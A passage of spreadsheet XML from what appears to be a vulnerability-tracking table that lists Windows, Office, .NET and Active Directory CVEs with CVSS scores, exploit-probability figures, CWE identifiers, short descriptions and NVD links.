        <v>0.012</v>
      </c>
      <c r="G2728" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2728" s="5" t="inlineStr"/>
      <c r="I2728" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2728" s="5" t="inlineStr"/>
      <c r="K2728" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L2728" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows TCP/IP allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69588</t>
        </is>
      </c>
    </row>
    <row r="2729">
      <c r="A2729" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69599</t>
        </is>
      </c>
      <c r="C2729" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2729" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2729" s="5" t="inlineStr"/>
      <c r="F2729" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2729" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2729" s="5" t="inlineStr"/>
      <c r="I2729" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2729" s="5" t="inlineStr"/>
      <c r="K2729" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2729" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t>
        </is>
      </c>
    </row>
    <row r="2730">
      <c r="A2730" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69607</t>
        </is>
      </c>
      <c r="C2730" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2730" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2730" s="5" t="inlineStr"/>
      <c r="F2730" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2730" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2730" s="5" t="inlineStr"/>
      <c r="I2730" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2730" s="5" t="inlineStr"/>
      <c r="K2730" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2730" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M2730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69607</t>
        </is>
      </c>
    </row>
    <row r="2731">
      <c r="A2731" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69631</t>
        </is>
      </c>
      <c r="C2731" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2731" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2731" s="5" t="inlineStr"/>
      <c r="F2731" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2731" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2731" s="5" t="inlineStr"/>
      <c r="I2731" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2731" s="5" t="inlineStr"/>
      <c r="K2731" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2731" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69631</t>
        </is>
      </c>
    </row>
    <row r="2732">
      <c r="A2732" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69710</t>
        </is>
      </c>
      <c r="C2732" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2732" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2732" s="5" t="inlineStr"/>
      <c r="F2732" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2732" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2732" s="5" t="inlineStr"/>
      <c r="I2732" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2732" s="5" t="inlineStr"/>
      <c r="K2732" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2732" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69710</t>
        </is>
      </c>
    </row>
    <row r="2733">
      <c r="A2733" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69739</t>
        </is>
      </c>
      <c r="C2733" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2733" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2733" s="5" t="inlineStr"/>
      <c r="F2733" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2733" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2733" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2733" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2733" s="5" t="inlineStr"/>
      <c r="K2733" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2733" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69739</t>
        </is>
      </c>
    </row>
    <row r="2734">
      <c r="A2734" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69744</t>
        </is>
      </c>
      <c r="C2734" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2734" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2734" s="5" t="inlineStr"/>
      <c r="F2734" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2734" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2734" s="5" t="inlineStr"/>
      <c r="I2734" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2734" s="5" t="inlineStr"/>
      <c r="K2734" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2734" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69744</t>
        </is>
      </c>
    </row>
    <row r="2735">
      <c r="A2735" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69760</t>
        </is>
      </c>
      <c r="C2735" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2735" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2735" s="5" t="inlineStr"/>
      <c r="F2735" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2735" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2735" s="5" t="inlineStr"/>
      <c r="I2735" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2735" s="5" t="inlineStr"/>
      <c r="K2735" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2735" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69760</t>
        </is>
      </c>
    </row>
    <row r="2736">
      <c r="A2736" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69793</t>
        </is>
      </c>
      <c r="C2736" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2736" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2736" s="5" t="inlineStr"/>
      <c r="F2736" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2736" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2736" s="5" t="inlineStr"/>
      <c r="I2736" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2736" s="5" t="inlineStr"/>
      <c r="K2736" s="5" t="inlineStr">
        <is>
          <t>CWE-1288</t>
        </is>
      </c>
      <c r="L2736" s="5" t="inlineStr">
        <is>
          <t>Improper validation of consistency within input in Windows TCP/IP allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M2736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69793</t>
        </is>
      </c>
    </row>
    <row r="2737">
      <c r="A2737" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69803</t>
        </is>
      </c>
      <c r="C2737" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2737" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2737" s="5" t="inlineStr"/>
      <c r="F2737" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2737" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2737" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2737" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2737" s="5" t="inlineStr"/>
      <c r="K2737" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2737" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t>
        </is>
      </c>
    </row>
    <row r="2738">
      <c r="A2738" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69804</t>
        </is>
      </c>
      <c r="C2738" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2738" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2738" s="5" t="inlineStr"/>
      <c r="F2738" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2738" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2738" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I2738" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2738" s="5" t="inlineStr"/>
      <c r="K2738" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L2738" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M2738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t>
        </is>
      </c>
    </row>
    <row r="2739">
      <c r="A2739" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69805</t>
        </is>
      </c>
      <c r="C2739" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2739" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2739" s="5" t="inlineStr"/>
      <c r="F2739" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2739" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H2739" s="5" t="inlineStr"/>
      <c r="I2739" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2739" s="5" t="inlineStr"/>
      <c r="K2739" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522, CWE-73</t>
        </is>
      </c>
      <c r="L2739" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in .NET allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M2739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69805</t>
        </is>
      </c>
    </row>
    <row r="2740">
      <c r="A2740" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69809</t>
        </is>
      </c>
      <c r="C2740" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2740" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2740" s="5" t="inlineStr"/>
      <c r="F2740" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G2740" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H2740" s="5" t="inlineStr"/>
      <c r="I2740" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2740" s="5" t="inlineStr"/>
      <c r="K2740" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L2740" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Active Directory Domain Services allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69809</t>
        </is>
      </c>
    </row>
    <row r="2741">
      <c r="A2741" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69852</t>
        </is>
      </c>
      <c r="C2741" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2741" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2741" s="5" t="inlineStr"/>
      <c r="F2741" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2741" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2741" s="5" t="inlineStr"/>
      <c r="I2741" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2741" s="5" t="inlineStr"/>
      <c r="K2741" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2741" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M2741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t>
        </is>
      </c>
    </row>
    <row r="2742">
      <c r="A2742" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69881</t>
        </is>
      </c>
      <c r="C2742" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2742" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2742" s="5" t="inlineStr"/>
      <c r="F2742" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2742" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2742" s="5" t="inlineStr"/>
      <c r="I2742" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2742" s="5" t="inlineStr"/>
      <c r="K2742" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2742" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t>
        </is>
      </c>
    </row>
    <row r="2743">
      <c r="A2743" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69890</t>
        </is>
      </c>
      <c r="C2743" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2743" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2743" s="5" t="inlineStr"/>
      <c r="F2743" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2743" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2743" s="5" t="inlineStr"/>
      <c r="I2743" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2743" s="5" t="inlineStr"/>
      <c r="K2743" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2743" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t>
        </is>
      </c>
    </row>
    <row r="2744">
      <c r="A2744" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69929</t>
        </is>
      </c>
      <c r="C2744" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2744" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2744" s="5" t="inlineStr"/>
      <c r="F2744" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2744" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2744" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2744" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2744" s="5" t="inlineStr"/>
      <c r="K2744" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2744" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t>
        </is>
      </c>
    </row>
    <row r="2745">
      <c r="A2745" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69930</t>
        </is>
      </c>
      <c r="C2745" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2745" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2745" s="5" t="inlineStr"/>
      <c r="F2745" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2745" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2745" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2745" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2745" s="5" t="inlineStr"/>
      <c r="K2745" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2745" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t>
        </is>
      </c>
    </row>
    <row r="2746">
      <c r="A2746" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70065</t>
        </is>
      </c>
      <c r="C2746" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2746" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2746" s="5" t="inlineStr"/>
      <c r="F2746" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2746" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2746" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2746" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2746" s="5" t="inlineStr"/>
      <c r="K2746" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L2746" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t>
        </is>
      </c>
    </row>
    <row r="2747">
      <c r="A2747" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70124</t>
        </is>
      </c>
      <c r="C2747" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2747" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2747" s="5" t="inlineStr"/>
      <c r="F2747" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2747" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2747" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2747" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2747" s="5" t="inlineStr"/>
      <c r="K2747" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2747" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t>
        </is>
      </c>
    </row>
    <row r="2748">
      <c r="A2748" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70570</t>
        </is>
      </c>
      <c r="C2748" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2748" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2748" s="5" t="inlineStr"/>
      <c r="F2748" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2748" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2748" s="5" t="inlineStr"/>
      <c r="I2748" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2748" s="5" t="inlineStr"/>
      <c r="K2748" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2748" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M2748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70570</t>
        </is>
      </c>
    </row>
    <row r="2749">
      <c r="A2749" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70579</t>
        </is>
      </c>
      <c r="C2749" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2749" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2749" s="5" t="inlineStr"/>
      <c r="F2749" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2749" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2749" s="5" t="inlineStr"/>
      <c r="I2749" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2749" s="5" t="inlineStr"/>
      <c r="K2749" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2749" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Mobile Broadband allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70579</t>
        </is>
      </c>
    </row>
    <row r="2750">
      <c r="A2750" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70587</t>
        </is>
      </c>
      <c r="C2750" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2750" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2750" s="5" t="inlineStr"/>
      <c r="F2750" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2750" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2750" s="5" t="inlineStr"/>
      <c r="I2750" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2750" s="5" t="inlineStr"/>
      <c r="K2750" s="5" t="inlineStr">
        <is>
          <t>CWE-170</t>
        </is>
      </c>
      <c r="L2750" s="5" t="inlineStr">
        <is>
          <t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t>
        </is>
      </c>
    </row>
    <row r="2751">
      <c r="A2751" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70601</t>
        </is>
      </c>
      <c r="C2751" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2751" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2751" s="5" t="inlineStr"/>
      <c r="F2751" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2751" s="5" t="inlineStr">
        <is>
          <t>windows, java, node.js</t>
        </is>
      </c>
      <c r="H2751" s="5" t="inlineStr"/>
      <c r="I2751" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2751" s="5" t="inlineStr"/>
